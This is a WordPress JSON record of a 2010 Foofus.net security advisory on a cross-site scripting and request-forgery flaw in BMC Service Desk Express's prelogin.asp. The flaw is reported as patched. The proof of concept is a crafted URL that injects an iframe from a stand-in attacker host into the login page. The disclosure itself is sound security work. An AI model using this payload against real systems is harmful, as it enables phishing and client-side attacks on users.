{"id":288,"date":"2011-05-25T13:27:37","date_gmt":"2011-05-25T19:27:37","guid":{"rendered":"http:\/\/www.foofus.net\/?page_id=288"},"modified":"2011-05-25T13:27:37","modified_gmt":"2011-05-25T19:27:37","slug":"bmc-service-desk-express-advisory","status":"publish","type":"page","link":"http:\/\/h.foofus.net\/?page_id=288","title":{"rendered":"BMC Service Desk Express Advisory"},"content":{"rendered":"<p>============================================================================<br \/>\nFoofus.net Security Advisory: foofus-20100523<br \/>\n============================================================================<br \/>\nTitle:\t\tBMC Service Desk Express XSS\/XSRF<br \/>\nVersion:\t1.0<br \/>\nVendor:\t\tBMC Software<br \/>\nRelease Date:\t23.05.2010<br \/>\nIssue Status:\tReported To Vendor \/ Patch Issued<br \/>\n============================================================================<\/p>\n<p>1. Summary<\/p>\n<p>BMC&#8217;s Service Desk Express software, is a popular tool for managing IT<br \/>\nactions and assets. A cross-site scripting vulnerability was discovered<br \/>\nwithin tested versions of this software. Additionally, this issue can be<br \/>\nused to perform cross-site request forgery attacks.<\/p>\n<p>2. Description<\/p>\n<p>A cross-site scripting vulnerability exists in prelogin.asp. the issue stems<br \/>\nfrom the fact that an adversary can control the output of the Authentication<br \/>\nError message. This is accomplished by setting the preLoginErrors variable<br \/>\nto &#8220;errorsoccurred&#8221; and injecting code using the Error variable.<\/p>\n<p>3. Proof of Concept<\/p>\n<p>The following URL will inject an iframe into the prelogin.asp authentication<br \/>\npage.<\/p>\n<p>http:\/\/helpdesk\/helpdesk\/PreLogin.asp?preLoginErrors=errorsoccured&#038;Error=%3Ciframe%20src=http:\/\/adversary.bad\/foo.php%3E%3C\/iframe%3E<\/p>\n<p>4. Impact<\/p>\n<p>Exploiting this attack allows an adversary to inject any type of web-based<br \/>\ncontent into the authentication screen to execute client-side attacks or<br \/>\nperform social engineering attacks. Often, this software is installed and<br \/>\nexposed to the public internet.<\/p>\n<p>5. Affected Products<\/p>\n<p>All tested versions of BMC&#8217;s Service Desk Express<\/p>\n<p>6. Solution<\/p>\n<p>The vendor has been notified and a patch has been released to solve this<br \/>\nissue.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>============================================================================ Foofus.net Security Advisory: foofus-20100523 ============================================================================ Title: BMC Service Desk Express XSS\/XSRF Version: 1.0 Vendor: BMC Software Release Date: 23.05.2010 Issue Status: Reported To Vendor \/ Patch Issued ============================================================================ 1. Summary BMC&#8217;s Service Desk Express software, is a popular tool for managing IT actions and assets. A cross-site scripting vulnerability was discovered within tested versions [&hellip;]<\/p>\n","protected":false},"author":7,"featured_media":0,"parent":273,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-288","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/288","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=288"}],"version-history":[{"count":0,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/288\/revisions"}],"up":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/273"}],"wp:attachment":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=288"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}